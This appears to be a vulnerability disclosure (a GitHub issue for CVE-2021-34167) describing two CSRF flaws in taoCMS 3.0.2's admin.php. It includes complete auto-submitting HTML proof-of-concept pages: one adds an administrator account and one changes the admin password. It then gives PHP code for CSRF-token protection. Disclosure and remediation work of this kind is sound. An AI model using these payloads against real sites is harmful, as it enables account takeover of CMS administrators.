CVE-2021-34167: There are two CSRF vulnerabilities that can add administrator account and change administrator password · Issue #6 · taogogo/taocms

Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php.


Once an administrator is logged in, opening either of the following malicious pages triggers a CSRF (Cross Site Request Forgery) attack against the admin session.

PoC:

one.html: adds a new account with administrator privileges

    <html><body>
    <script type="text/javascript">
    // Build a hidden form from the given input fields and auto-submit it.
    function post(url, fields) {
        var p = document.createElement("form");
        p.action = url;
        p.innerHTML = fields;
        p.target = "_self";
        p.method = "post";
        document.body.appendChild(p);
        p.submit();
    }
    function csrf_hack() {
        var fields = "";
        fields += "<input type='hidden' name='name' value='test' />";
        fields += "<input type='hidden' name='passwd' value='test' />";
        fields += "<input type='hidden' name='auth_level' value='admin' />";
        fields += "<input type='hidden' name='auth_cat' value='' />";
        fields += "<input type='hidden' name='status' value='1' />";
        fields += "<input type='hidden' name='action' value='admin' />";
        fields += "<input type='hidden' name='id' value='' />";
        fields += "<input type='hidden' name='ctrl' value='save' />";
        // The Submit button label is garbled in the page source and is kept as-is.
        fields += "<input type='hidden' name='Submit' value='��浜¤' />";
        var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
        post(url, fields);
    }
    window.onload = function() { csrf_hack(); };
    </script>
    </body></html>

After this forged request completes, a new account has been added.

two.html: changes the current administrator's password

    <html><body>
    <script type="text/javascript">
    // Same auto-submitting form helper as in one.html.
    function post(url, fields) {
        var p = document.createElement("form");
        p.action = url;
        p.innerHTML = fields;
        p.target = "_self";
        p.method = "post";
        document.body.appendChild(p);
        p.submit();
    }
    function csrf_hack() {
        var fields = "";
        fields += "<input type='hidden' name='pwd' value='admin123' />";
        fields += "<input type='hidden' name='action' value='user' />";
        fields += "<input type='hidden' name='ctrl' value='update' />";
        // The Submit button label is garbled in the page source and is kept as-is.
        fields += "<input type='hidden' name='Submit' value='¿®�¹!' />";
        var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
        post(url, fields);
    }
    window.onload = function() { csrf_hack(); };
    </script>
    </body></html>

After that, the administrator's password changes from 'admin' to 'admin123'.

Solution:
Add a CSRF token (or a CAPTCHA) check to every state-changing request, so that a request forged from another origin is rejected even though it carries the admin's session cookie.
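One way to implement that token check for the admin.php requests shown above, as an added example in PHP that is not taoCMS's own code; the function names csrf_token, csrf_field and csrf_verify and the 'delete' ctrl value are assumptions, and the field names follow the PoC forms:

```php
<?php
// Added example, not taoCMS code: synchronizer-token CSRF protection for the
// state-changing admin.php requests shown above (ctrl=save, ctrl=update).
// Function names are hypothetical; the $_POST field names follow the PoC.

// Defense in depth (PHP >= 7.3): a Lax SameSite cookie is not sent with
// cross-site POSTs, so the forged form would arrive without the admin session.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every legitimate admin form.
function csrf_field(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '" />';
}

// A page on another origin cannot read the session token, so a forged POST
// never carries the right value. hash_equals() compares in constant time.
function csrf_verify(): bool
{
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Wiring for admin.php: check before any handler that writes state.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ctrl = $_POST['ctrl'] ?? '';
    if (in_array($ctrl, ['save', 'update', 'delete'], true) && !csrf_verify()) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // existing save/update handling continues here
}
```

Every legitimate admin form must include csrf_field() in its markup; both one.html and two.html would then receive a 403 because they cannot supply the session's token.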
